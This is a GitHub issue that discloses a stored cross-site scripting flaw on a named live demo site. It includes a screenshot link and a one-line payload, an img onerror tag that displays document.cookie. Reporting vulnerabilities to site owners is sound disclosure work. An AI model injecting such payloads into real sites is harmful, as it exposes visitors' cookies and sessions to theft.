Skip to content

Update your site because it's still vulnerable to Stored XSS #12

@ghost

Description

http://labs.carsonshold.com/fb-photo-selector/

http://i.imgur.com/eBC4eIM.png
ebc4eim

Payload: "><img src=x onerror=alert(document.cookie)>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions